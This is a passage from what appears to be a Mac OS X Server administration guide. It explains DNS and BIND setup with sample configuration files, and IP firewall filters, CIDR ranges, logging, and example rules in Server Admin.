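You can watch the rotation with dig. The transcript below is only illustrative; it assumes the three records above are being served, and the order you see will change from query to query:

```
$ dig +short www.example.com
192.168.12.12
192.168.12.13
192.168.12.14
$ dig +short www.example.com
192.168.12.13
192.168.12.14
192.168.12.12
```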
Setting Up a Private TCP/IP Network
If you have a local area network that has a connection to the Internet, you must set up
your server and client computers with IP addresses and other information that’s unique
to the Internet. You obtain IP addresses from your Internet service provider (ISP).
If it’s unlikely that your local area network will ever be connected to the Internet and
you want to use TCP/IP as the protocol for transmitting information on your network,
it’s possible to set up a “private” TCP/IP network. When you set up a private network,
you choose IP addresses from the blocks of IP addresses that the IANA (Internet
Assigned Numbers Authority) has reserved for private intranets:
• 10.0.0.0–10.255.255.255 (10/8 prefix)
• 172.16.0.0–172.31.255.255 (172.16/12 prefix)
• 192.168.0.0–192.168.255.255 (192.168/16 prefix)
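The reserved blocks above can be checked mechanically. The following shell sketch (the function name is our own, not part of Mac OS X Server) reports whether an IPv4 address falls in one of the IANA private ranges:

```shell
#!/bin/sh
# Return success (0) if the address is in 10/8, 172.16/12, or 192.168/16.
is_private_ip() {
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs   # split into octets
    if [ "$1" -eq 10 ]; then return 0; fi
    if [ "$1" -eq 172 ] && [ "$2" -ge 16 ] && [ "$2" -le 31 ]; then return 0; fi
    if [ "$1" -eq 192 ] && [ "$2" -eq 168 ]; then return 0; fi
    return 1
}

is_private_ip 10.0.1.2 && echo "10.0.1.2 is private"
is_private_ip 17.254.3.183 || echo "17.254.3.183 is not private"
```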
If you set up a private TCP/IP network, you can also provide DNS service. By setting up
TCP/IP and DNS on your local area network, your users will be able to easily access file,
web, mail, and other services on your network.
Hosting Several Internet Services With a Single IP Address
You may have a single server supplying all your Internet services (such as mail and
web), all running on one computer with a single IP address. For example, you may want to
have the domain name www.example.com resolve to the same IP address as
ftp.example.com, or mail.example.com.
Setting up the DNS records for this service is easy. You’ll still need a full set of DNS
records, one for each name you want to resolve.
• Set up MX records for mail, so mail.example.com resolves to your server’s IP address.
• Set up A records for each service your server provides, so web.example.com resolves
to your server’s IP address.
• Do the same for each service you provide (ftp.apple.com, or fileshare.apple.com, or
whatever).
As your needs grow, you can add other computers to the network to take over these
services. Then all you have to do is update the DNS record, and your clients’ settings
can remain the same.
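Sketched as zone records, with the illustrative address 192.168.12.12 standing in for your server, the setup might look like this:

```
; db.example.com: every service name resolves to the same host
example.com.         IN  MX  10 mail.example.com.
mail.example.com.    IN  A   192.168.12.12
www.example.com.     IN  A   192.168.12.12
ftp.example.com.     IN  A   192.168.12.12
```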
Configuring BIND Using the Command Line
To set up and use DNS service on Mac OS X Server, you may wish to configure BIND
using the command line. Configuring BIND requires making changes to UNIX
configuration files in the Terminal application. To configure BIND, you must be
comfortable with typing UNIX commands and using a UNIX text editor. Only
manipulate these settings if you have a thorough understanding of DNS and BIND,
preferably as an experienced DNS administrator.
What Is BIND?
BIND stands for Berkeley Internet Name Domain. BIND runs on UNIX-based operating
systems and is distributed as open-source software. BIND is used on the majority of
name servers on the Internet today.
Important: If you think you might want to connect to the Internet in the future, you
should register with an Internet registry and use the IP addresses provided by the
registry when setting up your private network. Otherwise, when you do connect to
the Internet, you’ll need to reconfigure every computer on your network.
Warning: Incorrect BIND configurations can result in serious network problems.
BIND is configured by editing text files containing information about how you want
BIND to behave and information about the servers on your network. If you wish to
learn more about DNS and BIND, resources are listed at the end of this chapter.
BIND on Mac OS X Server
Mac OS X Server uses BIND version 9.2.2. You can start and stop DNS service on
Mac OS X Server using the Server Admin application. You can use Server Admin to view
DNS status and usage statistics.
BIND Configuration File
By default, BIND looks for a configuration file labeled “named.conf” in the /etc directory.
This file contains commands you can use to configure BIND’s many options. It also
specifies the directory to use for zone data files.
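A minimal named.conf might look like the following sketch; the zone and file names are examples rather than the configuration shipped with Mac OS X Server:

```
// /etc/named.conf (illustrative minimal configuration)
options {
        directory "/var/named";      // where zone data files live
};

zone "example.com" IN {
        type master;
        file "example.com.zone";     // address records for the zone
};
```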
Zone Data Files
Zone data files consist of paired address files and reverse lookup files. Address records
link host names (host1.example.com) to IP addresses. Reverse lookup records do the
opposite, linking IP addresses to host names. Address record files are named after your
domain name (for example, example.com). Reverse lookup file names look like part of
an IP address, such as db.192.168.12.
By default, the zone data files are located in /var/named/.
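As a sketch, a paired entry for a host named host1.example.com at the illustrative address 192.168.12.12 would look like this:

```
; In the address file (db.example.com): name to address
host1.example.com.            IN  A    192.168.12.12

; In the reverse lookup file (db.192.168.12): address to name
12.12.168.192.in-addr.arpa.   IN  PTR  host1.example.com.
```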
Practical Example
The following example allows you to create a basic DNS configuration using BIND for a
typical network behind a Network Address Translation (NAT) device that connects to an
ISP. The port (cable modem/DSL/dial-up/etc.) that is connected to your ISP is referred to
here as the WAN interface. The port that is connected to your internal network is
referred to here as the LAN interface. The sample files you need are installed with
Mac OS X Server in the directories listed in the steps below. This example also assumes
the following:
• The IP address of the WAN interface is determined by your ISP.
• The IP address of the LAN interface is 10.0.1.1.
• The IP address of the Mac OS X or Mac OS X Server computer that will be used as the
DNS server is 10.0.1.2.
• The IP addresses for client computers are 10.0.1.3 through 10.0.1.254.
If IP address assignment is provided by the NAT device via DHCP, it must be configured
with the above information. Please consult your router or gateway manual for
instructions on configuring its DHCP server.
If your NAT device connects to the Internet, you also need to know the DNS server
addresses provided by your ISP.
Setting Up Sample Configuration Files
The sample files can be found in /usr/share/named/examples.
The sample files assume a domain name of example.com behind the NAT. This may be
changed, but must be changed in all modified configuration files. This includes
renaming /var/named/example.com.zone to the given domain name, for example, /var/
named/foo.org.zone.
To set up the sample files:
1 In Terminal, log in as root.
2 Enter the following command:
cp /etc/named.conf /etc/named.conf.OLD
This saves a backup copy of the named process configuration file.
3 Then, enter the following command:
cp /usr/share/named/examples/db.10.0.1.sample /var/named/10.0.1.zone
This copies the sample file for the NAT zone.
4 Enter the following command:
cp /usr/share/named/examples/example.com.sample /var/named/
example.com.zone
This copies the sample file for your domain.
5 Now, enter the following command:
cp /usr/share/named/examples/named.conf.sample /etc/named.conf
This copies in a sample named process configuration file.
6 Using a command-line text editor (like pico, or emacs), open /etc/named.conf for
editing.
7 Follow the instructions in the sample file to apply edits appropriate to your specific
installation.
8 Save your changes to named.conf.
9 Use Server Admin to start DNS service.
10 In the Network pane of System Preferences, change the domain name servers to list
only the IP address of the new DNS server, 10.0.1.2.
Configuring Clients
If the IP addresses of your client computers are statically assigned, change the domain
name servers of their Network preference panes to only list the new server’s IP address,
10.0.1.2.
If you are using Mac OS X Server as your DHCP Server:
1 In Server Settings, click the Network tab, click DHCP/NetBoot, and choose Configure
DHCP/NetBoot.
2 On the Subnet tab, select the subnet on the built-in Ethernet port and click Edit.
3 In the General tab, enter the following information:
Start: 10.0.1.3
End: 10.0.1.254
Subnet Mask: 255.255.255.0
Router: 10.0.1.1
4 Click the DNS tab and enter the following information:
Default Domain: example.com
DNS Servers: 10.0.1.2
5 Click the Save button and log out of Server Settings.
Note: The client computers may not receive the new IP configuration information
immediately; this depends on when their DHCP leases expire. It may be necessary to
restart the client computers for the changes to take effect.
Check Your Configuration
To verify the steps were successful, open Terminal, located in /Applications/Utilities and
enter the following commands (substituting the local domain name for
“server.example.com” as appropriate):
dig server.example.com
dig -x 10.0.1.2
Note: If this generic configuration example does not meet your needs, Apple
recommends that you don’t attempt to configure DNS on your own and that you seek
out a professional consultant or additional documentation.
Using DNS With Dynamically Assigned IP Addresses
Dynamic DNS is a mechanism that lets you modify the IP address/domain name list
without directing the name server to reload the edited list. This means you can update
the name server remotely and easily modify DNS data.
You can use dynamic DNS with DHCP service. DHCP assigns each client computer a
dynamic IP address when the computer starts up. Because a DHCP server may assign IP
addresses randomly, it can be useful to assign meaningful DNS names to these
addresses on the fly.
For instance, if “Bob” walks into work in the morning and starts up his computer, and
the DHCP server assigns his computer a dynamic IP address, a DNS entry
“bob.example.com” can be associated with that IP address. Even though Bob’s IP
address may change every time he starts up his computer, his DNS name remains the
same. This lets users communicate with Bob’s computer without knowing the IP
address.
You can also use dynamic DNS to provide static host names for users who connect to
the Internet through a modem. An ISP can set up dynamic DNS so a home computer
has the same host name every time it connects.
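With BIND, dynamic updates are typically pushed with the nsupdate tool. The transcript below is only a sketch; it assumes the zone on 10.0.1.2 has been configured to accept dynamic updates, and the host name and address are illustrative:

```
$ nsupdate
> server 10.0.1.2
> update add bob.example.com 3600 A 10.0.1.37
> send
> quit
```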
Where to Find More Information
For more information on DNS and BIND, see the following:
• DNS and BIND, 4th edition, by Paul Albitz and Cricket Liu (O’Reilly and Associates,
2001)
• The Internet Software Consortium website:
www.isc.org and www.isc.org/products/BIND/
• The DNS Resources Directory:
www.dns.net/dnsrd/
Request For Comment Documents
Request for Comments (RFC) documents provide an overview of a protocol or service
and details about how the protocol should behave. If you’re a novice server
administrator, you’ll probably find some of the background information in an RFC
helpful. If you’re an experienced server administrator, you can find all the technical
details about a protocol in its RFC document. You can search for RFC documents by
number at the website www.faqs.org/rfcs.
• A, PTR, CNAME, MX: For more information, see RFC 1035.
• AAAA: For more information, see RFC 1886.
3 IP Firewall Service
Firewall service is software that protects the network applications running on your
Mac OS X Server. Turning on firewall service is similar to erecting a wall to limit access.
Firewall service scans incoming IP packets and rejects or accepts these packets based
on the set of filters you create. You can restrict access to any IP service running on the
server, and you can customize filters for all incoming clients or for a range of client IP
addresses.
The following example shows how the firewall handles a connection attempt:
1 A computer with IP address 10.221.41.33 attempts to connect to the server over the
Internet (port 80). The server begins looking for filters.
2 Is there a filter for port 80? If not, the server locates the Any Port filter with the
most specific range that includes the address 10.221.41.33, and that filter applies.
3 If there is a filter for port 80, is there such a filter containing IP address
10.221.41.33? If so, that filter applies.
4 What does the applied filter specify? If Allow, the connection is made; if Deny, the
connection is refused.
Services such as Web and FTP are identified on your server by a Transmission Control
Protocol (TCP) or User Datagram Protocol (UDP) port number. When a computer tries to
connect to a service, firewall service scans the filter list for a matching port number.
• If the port number is in the filter list, the filter applied is the one that contains the
most specific address range.
• If the port number is not in the list, the Default filter that contains the most specific
address range is used.
The port filters you create are applied to TCP packets and can also be applied to UDP
packets. In addition, you can set up filters for restricting Internet Control Message
Protocol (ICMP), Internet Group Management Protocol (IGMP), and NetInfo data.
If you plan to share data over the Internet, and you don’t have a dedicated router or
firewall to protect your data from unauthorized access, you should use firewall service.
This service works well for small to medium businesses, schools, and small or home
offices.
Large organizations with a firewall can use firewall service to exercise a finer degree of
control over their servers. For example, individual workgroups within a large business,
or schools within a school system, may want to use firewall service to control access to
their own servers.
IP Firewall also provides stateful packet inspection which determines whether an
incoming packet is a legitimate response to an outgoing request or part of an ongoing
session, allowing packets that would otherwise be denied.
Mac OS X Server uses the application ipfw for firewall service.
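Server Admin normally manages the underlying rules for you, but as an illustration of what ipfw rules look like from the command line (run as root; the rule numbers, address range, and port are examples, not defaults):

```
# ipfw list
# ipfw add 1000 allow tcp from 10.221.41.0/24 to any 80 in
# ipfw add 1100 deny tcp from any to any 80 in
```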
Important: When you start firewall service the first time, most incoming TCP
packets are denied until you change the filters to allow access. By default, only the
ports essential to remote administration are available. These include access by
Remote Directory Access (625), Server Administration via Server Admin (687), and
Secure Shell (22). For any other network service, you must create filters to allow
access to your server. If you turn firewall service off, all addresses are allowed access
to your server.
Understanding Firewall Filters
When you start firewall service, the default configuration denies access to all incoming
packets from remote computers except ports for remote configuration. This provides a
high level of security. You can then add new IP filters to allow server access to those
clients who require access to services.
To learn how IP filters work, read the following section. To learn how to create IP filters,
see “Managing Firewall Service” on page 49.
What is a Filter?
A filter is made up of an IP address and a subnet mask, and sometimes a port number
and access type. The IP address and the subnet mask together determine the range of
IP addresses to which the filter applies, and can be set to apply to all addresses.
IP Address
IP addresses consist of four segments with values between 0 and 255 (the range of an
8-bit number), separated by dots (for example, 192.168.12.12). The segments in IP
addresses go from general to specific (for example, the first segment might belong to
all the computers in a whole company, and the last segment might belong to a specific
computer on one floor of a building).
Subnet Mask
A subnet mask indicates which segments in the specified IP address can vary on a
given network and by how much. The subnet mask is given in Classless Inter Domain
Routing (CIDR) notation. It consists of the IP address followed by a slash (/) and a
number from 1 to 32, called the IP prefix. An IP prefix identifies the number of
significant bits used to identify a network.
For example, 192.168.2.1/16 means the first 16 bits (the first two numbers separated by
periods) are used to represent the network (every machine on the network begins with
192.168) and the remaining 16 bits (the last two numbers separated by periods) are
used to identify hosts (each machine has a unique set of trailing numbers).
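The CIDR-to-netmask correspondence can also be computed directly. This shell sketch (the function name is our own) converts a prefix length from 1 to 32 into dotted netmask notation:

```shell
#!/bin/sh
# Convert a CIDR prefix length (1-32) into a dotted-decimal netmask.
prefix_to_netmask() {
    mask=$(( (4294967295 << (32 - $1)) & 4294967295 ))   # high $1 bits set
    echo "$(( (mask >> 24) & 255 )).$(( (mask >> 16) & 255 )).$(( (mask >> 8) & 255 )).$(( mask & 255 ))"
}

prefix_to_netmask 16   # 255.255.0.0
prefix_to_netmask 22   # 255.255.252.0
```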
Subnet masks in CIDR notation correspond to netmask notation as follows:

CIDR   Corresponds to netmask   Number of addresses in the range
/1     128.0.0.0                2.15x10^9
/2     192.0.0.0                1.07x10^9
/3     224.0.0.0                5.37x10^8
/4     240.0.0.0                2.68x10^8
/5     248.0.0.0                1.34x10^8
/6     252.0.0.0                6.71x10^7
/7     254.0.0.0                3.35x10^7
/8     255.0.0.0                1.67x10^7
/9     255.128.0.0              8.38x10^6
/10    255.192.0.0              4.19x10^6
/11    255.224.0.0              2.09x10^6
/12    255.240.0.0              1.04x10^6
/13    255.248.0.0              5.24x10^5
/14    255.252.0.0              2.62x10^5
/15    255.254.0.0              1.31x10^5
/16    255.255.0.0              65536
/17    255.255.128.0            32768
/18    255.255.192.0            16384
/19    255.255.224.0            8192
/20    255.255.240.0            4096
/21    255.255.248.0            2048
/22    255.255.252.0            1024
/23    255.255.254.0            512
/24    255.255.255.0            256
/25    255.255.255.128          128
/26    255.255.255.192          64
/27    255.255.255.224          32
/28    255.255.255.240          16
/29    255.255.255.248          8
/30    255.255.255.252          4
/31    255.255.255.254          2
/32    255.255.255.255          1
Using Address Ranges
When you create filters using Server Admin, you enter an IP address and the CIDR
format subnet mask. Server Admin shows you the resulting address range, and you can
change the range by modifying the subnet mask. When you indicate a range of
possible values for any segment of an address, that segment is called a wildcard. The
following table gives examples of address ranges created to achieve specific goals.
Rule Mechanism and Precedence
The filter rules in the General panel operate in conjunction with the rules shown in the
Advanced panel. Usually, the broad rules in the Advanced panel block access for all
ports. These are lower-priority rules and take effect after the rules in the General panel.
The rules created with the General panel open access to specific services, and are
higher priority. They take precedence over those created in the Advanced panel. If you
create multiple filters in the Advanced panel, a filter’s precedence is determined by its
rule number, which is the rule’s order in the Advanced panel. Rules in the Advanced
panel can be re-ordered by dragging them within the list.
For most normal uses, opening access to designated services using the General panel is
sufficient. If necessary, you can add additional rules using the Advanced panel, creating
and ordering them as needed.
Multiple IP Addresses
A server can support multiple (multihomed) IP addresses, but firewall service applies one
set of filters to all server IP addresses. If you create multiple alias IP addresses, the
filters you create will apply to all of those IP addresses.
The following examples show address ranges created to achieve specific goals (the
sample IP address is 10.221.41.33 in each case):

Goal: create a filter that specifies a single IP address.
  Enter in the address field: 10.221.41.33 or 10.221.41.33/32
  Address range affected: 10.221.41.33 (single address)

Goal: create a filter that leaves the fourth segment as a wildcard.
  Enter in the address field: 10.221.41.33/24
  Address range affected: 10.221.41.0 to 10.221.41.255

Goal: create a filter that leaves part of the third segment and all of the fourth
segment as a wildcard.
  Enter in the address field: 10.221.41.33/22
  Address range affected: 10.221.40.0 to 10.221.43.255

Goal: create a filter that applies to all incoming addresses.
  Enter in the address field: select “Any”
  Address range affected: all IP addresses
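The address ranges above can be derived with a little bit arithmetic. This shell sketch (the function names are our own) computes the range a given address/prefix pair covers:

```shell
#!/bin/sh
# Compute the first and last addresses covered by an address/prefix pair.
ip_to_int() {
    old_ifs=$IFS; IFS=.; set -- $1; IFS=$old_ifs   # split into octets
    echo $(( ($1 << 24) + ($2 << 16) + ($3 << 8) + $4 ))
}

int_to_ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

cidr_range() {
    n=$(ip_to_int "$1")
    mask=$(( (4294967295 << (32 - $2)) & 4294967295 ))
    echo "$(int_to_ip $(( n & mask ))) to $(int_to_ip $(( n | (4294967295 ^ mask) )))"
}

cidr_range 10.221.41.33 24   # 10.221.41.0 to 10.221.41.255
cidr_range 10.221.41.33 22   # 10.221.40.0 to 10.221.43.255
```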
Setting Up Firewall Service for the First Time
Once you’ve decided which filters you need to create, follow these overview steps to
set up firewall service. If you need more help to perform any of these steps, see
“Managing Firewall Service” on page 49 and the other topics referred to in the steps.
Step 1: Learn and plan
If you’re new to working with IP Firewall, learn and understand firewall concepts, tools,
and features of Mac OS X Server and BIND. For more information, see “Understanding
Firewall Filters” on page 45.
Then plan your IP Firewall Service by planning which services you want to provide
access to. Mail, web, and FTP services generally require access from computers on the
Internet. File and print services will most likely be restricted to your local subnet.
Once you decide which services you want to protect using firewall service, you need to
determine which IP addresses you want to allow access to your server, and which IP
addresses you want to deny access to your server. Then you can create the appropriate
filters.
Step 2: Start firewall service
In Server Admin, select Firewall and click Start Service. By default, this blocks all
incoming ports except those used to configure the server remotely. If you’re
configuring the server locally, turn off external access immediately.
Step 3: Create an IP address group that filters will apply to
By default, there is an address group created for all incoming IP addresses. Filters
applied to this group will affect all incoming network traffic.
You can create additional groups based on source IP number or destination IP number.
See “Creating an Address Group” on page 50 for more information.
Step 4: Add filters to the IP filter list
Read “Understanding Firewall Filters” on page 45 to learn how IP filters work and how
to create them. You can use these filters to protect other services, strengthen your
network security, and manage your network traffic through the firewall.
For information about creating a new filter, see “Creating an Advanced IP Filter for TCP
ports” on page 51.
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
Step 5: Save firewall service changes
Once you have configured your filters and determined which services to allow, save
your changes so the new settings take effect.
Managing Firewall Service
This section gives step-by-step instructions for starting, stopping, and configuring
firewall address groups and filters.
Starting and Stopping Firewall Service
By default, firewall service blocks all incoming TCP connections and allows all UDP
connections. Before you turn on firewall service, make sure you’ve set up filters
allowing access from IP addresses you choose. Otherwise, no one will have access to
your server.
To start or stop firewall service:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Start Firewall.
When the service is started, the Stop Service button is available.
Opening the Firewall for Standard Services
By default, firewall service blocks all incoming TCP connections and allows all UDP
connections. Before you turn on firewall service, make sure you’ve set up filters
allowing access from IP addresses you choose; otherwise, no one will have access to
your server.
You can easily allow standard services through the firewall without advanced and
extensive configuration. Standard services include (but are not limited to):
• Web service
• Apple File service
• Windows File service
• FTP service
• Printer Sharing
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
• DNS/Rendezvous
• ICMP Echo Reply (incoming pings)
• IGMP (Internet Gateway Multicast Protocol)
• PPTP VPN
• L2TP VPN
• QTSS media streaming
• iTunes Music Sharing
To open the firewall for standard services:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
If you want to restrict or designate IP addresses for a standard service, you should
create an address group rather than use the Any address group. See “Creating an
Address Group” on page 50 for more information.
5 Select the services you want to allow.
6 Click Save.
Creating an Address Group
You can define groups of IP addresses for your firewall filters. These groups are used to
organize and target the filters. The default address group is for all addresses.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
format netmask (192.168.2.0/24).
To create an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Click Add beneath the Address Group pane.
5 Enter a group name.
6 Enter the addresses and subnet mask you want the filters to affect.
7 Click OK.
Important: If you add or change a filter after starting firewall service, the new filter
will affect connections already established with the server. For example, if you deny
all access to your FTP server after starting firewall service, computers already
connected to your FTP server will be disconnected.
Editing or Deleting an Address Group
You can edit your address groups to change the range of IP addresses affected. The
default address group is for all addresses. You can remove address groups from your
firewall filter list. The filters associated with those addresses are also deleted.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
format netmask (192.168.2.0/24).
To edit or delete an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the group name from the Address Group pane.
5 Click the Edit button beneath the Address Group pane to edit it.
Click the Delete button beneath the Address Group pane to delete it.
6 Edit the Group name or addresses as needed.
7 Click OK.
8 Click Save.
Duplicating an Address Group
You can duplicate address groups from your firewall filter list. This can help speed up
configuration of similar address groups.
To duplicate an address group:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the group name from the Address Group pane.
5 Click the Duplicate button beneath the Address Group pane.
Creating an Advanced IP Filter for TCP ports
You can use the Advanced Settings pane to configure very specific filters for TCP ports.
IP filters contain an IP address and a subnet mask. You can apply a filter to all IP
addresses, a specific IP address, or a range of IP addresses.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
netmask (192.168.2.0/24).
To create an IP filter for TCP ports:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Click the New button.
Alternatively, you can select a rule similar to the one you want to create, and click
Duplicate then Edit.
5 Select whether this filter will allow or deny access in the Action pop-up menu.
6 Choose TCP from the Protocol pop-up menu.
7 Choose a TCP service from the pop-up menu.
If you want to select a nonstandard service port, choose Other.
8 If desired, choose to log packets that match the filter.
9 Enter the Source IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
10 Enter the Destination IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the destination port number.
11 Choose which network interface this filter applies to.
12 Click OK.
13 Click Save to apply the filter immediately.
Creating an Advanced IP Filter for UDP Ports
You can use the Advanced Settings pane to configure very specific filters for UDP
ports. Many services use User Datagram Protocol (UDP) to communicate with the
server. By default, all UDP connections are allowed. You should apply filters to UDP
ports sparingly, if at all, because “deny” filters could create severe congestion in your
server traffic.
If you filter UDP ports, don’t select the “Log all allowed packets” option in the filter
configuration windows in Server Admin. Since UDP is a “connectionless” protocol, every
packet to a UDP port will be logged if you select this option.
You should also allow UDP port access for specific services, including:
• DNS
• DHCP
• SLP
• Windows Name Service browsing
• Remote Desktop
• NFS
• NetInfo
UDP ports above 1023 are allocated dynamically by certain services, so their exact port
numbers may not be determined in advance.
Addresses can be listed as individual addresses (192.168.2.2) or IP address and CIDR
netmask (192.168.2.0/24).
To easily configure UDP access for these ports, see “Opening the Firewall for Standard
Services” on page 49. If you need more advanced firewall settings for these basic UDP
services, use the following instructions to create them.
To create an IP filter for UDP ports:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Click the New button.
Alternatively, you can select a rule similar to the one you want to create, and click
Duplicate then Edit.
5 Select whether this filter will allow or deny access in the Action pop-up menu.
6 Choose UDP from the Protocol pop-up menu.
7 Choose a UDP service from the pop-up menu.
If you want to select a nonstandard service port, choose Other.
8 If desired, choose to log packets that match the filter.
9 Enter the Source IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the source port number.
10 Enter the Destination IP address range you want to filter.
If you want it to apply to any address, choose Any from the pop-up menu.
If you have selected a nonstandard service port, enter the destination port number.
11 Choose which network interface this filter applies to.
12 Click OK.
13 Click Save to apply the filter immediately.
Editing Advanced IP Filters
If you edit a filter after turning on firewall service, your changes affect connections
already established with the server. For example, if any computers are connected to
your Web server, and you change the filter to deny all access to the server, connected
computers will be disconnected.
To edit advanced IP filters:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Advanced tab.
4 Select a filter and click Duplicate, Edit, or Delete. If you’re deleting a filter, you’ve
finished.
5 Make any changes to the settings, then click Save.
Changing the Default Filter
If the server receives a packet using a port or IP address to which none of your filters
apply, firewall service uses the Default filter. You can set the Default filter to either deny
or allow these packets for specific IP addresses. By default the Default filter denies
access.
If you need to change the Default filter to allow access, you can. However, you
shouldn’t take this action lightly. Changing the default to allow means you must
explicitly deny access to your services by setting up specific port filters for all the
services that need protection.
It is recommended that you leave the Default filter in place and use the General panel
to create higher priority rules which allow access to designated services.
To change the Default setting:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select Default and click Edit.
5 Make any changes to the settings, then Click Save.
Monitoring Firewall Service
A firewall is a network's first line of defense against malicious computer users (commonly called "hackers"). To maintain the security of your computers and users, you need to monitor firewall activity and deter potential threats. This section explains how to log and monitor your firewall.
Viewing the Firewall Status Overview
The Status Overview shows a simple summary of the firewall service. It shows whether or not the service is running and which filter rules are active.
To see the overview:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click the Overview button.
Setting Up Logs for Firewall Service
You can log only the packets that are denied by the filters you set, only the packets
that are allowed, or both. Both logging options can generate a lot of log entries, which
can fill up disk space and degrade the performance of the server. You should use “Log
all allowed packets” only for limited periods of time.
You can choose to log allowed packets, denied packets, and a designated number of
packets.
To set up logs:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Select the logging options you want.
5 Click Save to start logging.
Viewing the Firewall Log
Each filter you create in Server Admin corresponds to one or more rules in the
underlying firewall software. Log entries show you the rule applied, the IP address of
the client and server, and other information.
To view the log for firewall service:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Log tab.
Here are some examples of firewall log entries and how to read them.
Log Example 1
Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP
10.221.41.33:2190 192.168.12.12:80 in via en0
This entry shows that firewall service used rule 65000 to deny (unreach) the remote
client at 10.221.41.33:2190 from accessing server 192.168.12.12 on Web port 80 via
Ethernet port 0.
Log Example 2
Dec 12 13:20:15 mayalu6 mach_kernel: ipfw: 100 Accept TCP
10.221.41.33:721 192.168.12.12:515 in via en0
This entry shows that firewall service used rule 100 to allow the remote client at
10.221.41.33:721 to access the server 192.168.12.12 on the LPR printing port 515 via
Ethernet port 0.
Log Example 3
Dec 12 13:33:15 smithy2 mach_kernel: ipfw: 10 Accept TCP
192.168.12.12:49152 192.168.12.12:660 out via lo0
This entry shows that firewall service used rule 10 to send a packet to itself on port 660
via the loopback device 0.
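The log entries above share a fixed layout after the "ipfw:" marker: rule number, action, protocol, source, destination. A short awk sketch, run here against the sample entries from this section, pulls those fields out:

```shell
# Extract rule, action, protocol, source, and destination from ipfw log lines.
awk '{
  for (i = 1; i <= NF; i++)            # find the "ipfw:" marker...
    if ($i == "ipfw:") break
  printf "rule=%s action=%s proto=%s src=%s dst=%s\n",
         $(i+1), $(i+2), $(i+3), $(i+4), $(i+5)   # ...the fields follow it
}' <<'EOF'
Dec 12 13:08:16 ballch5 mach_kernel: ipfw: 65000 Unreach TCP 10.221.41.33:2190 192.168.12.12:80 in via en0
Dec 12 13:20:15 mayalu6 mach_kernel: ipfw: 100 Accept TCP 10.221.41.33:721 192.168.12.12:515 in via en0
EOF
```

For the first entry this prints rule=65000 action=Unreach proto=TCP src=10.221.41.33:2190 dst=192.168.12.12:80, matching the reading given in Log Example 1.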
Viewing Denied Packets
Viewing denied packets can help you identify problems and troubleshoot firewall
service.
To view denied packets:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the Logging tab.
4 Make sure “Log denied packets” is checked.
5 View log entries in Server Admin by clicking Log.
Viewing Packets Logged by Filter Rules
Viewing filtered packets can help you identify problems and troubleshoot firewall
service.
To view filtered packets:
1 Turn on logging of filtered packets in filter editing window.
See “Editing Advanced IP Filters” on page 54 if you have not turned on logging for a
particular filter.
2 To view log entries in Server Admin, choose Firewall from the Computers & Services list.
3 Click Log.
Practical Examples
The IP filters you create work together to provide security for your network. The
examples that follow show how to use filters to achieve some specific goals.
Block Access to Internet Users
This section shows you, as an example, how to allow users on your subnet access to
your server’s Web service, but deny access to the general public on the Internet:
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Make sure that Web Service is disabled in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
8 Add the local network address range.
This is done by using an example address from the network with its network mask in
CIDR notation. For example, if a user has an address of 192.168.1.20 and the network
mask is 255.255.255.0, then enter 192.168.1.20/24.
9 Click OK.
10 Select your newly created address group.
11 Select “Web Service” in the right pane to enable web access.
12 Click Save.
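The netmask-to-CIDR conversion in step 8 is just a count of the set bits in the mask. A small shell helper (illustrative only, not part of Server Admin) makes the rule explicit:

```shell
# Convert a dotted netmask to its CIDR prefix length by counting set bits:
# 255.255.255.0 -> 24, so 192.168.1.20 with that mask is entered as
# 192.168.1.20/24.
mask_to_prefix() {
  local IFS=. n=0 octet
  for octet in $1; do
    while [ "$octet" -gt 0 ]; do
      n=$(( n + (octet & 1) ))
      octet=$(( octet >> 1 ))
    done
  done
  echo "$n"
}

mask_to_prefix 255.255.255.0   # 24
mask_to_prefix 255.255.0.0     # 16
```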
Block Junk Mail
This section shows you, as an example, how to reject email from a junk mail sender
with an IP address of 17.128.100.0 and accept all other Internet email:
To do this:
1 In Server Admin, choose Firewall from the Computers & Services list.
2 Click Settings.
3 Select the General tab.
4 Select the Any address group.
5 Enable “SMTP Mail” in the right pane.
6 Click the Add button to create an address range.
7 Name the address group.
Enter 17.128.100.0 as the address range to indicate the junk mail sender's address.
9 Click OK.
10 Select your newly created address group.
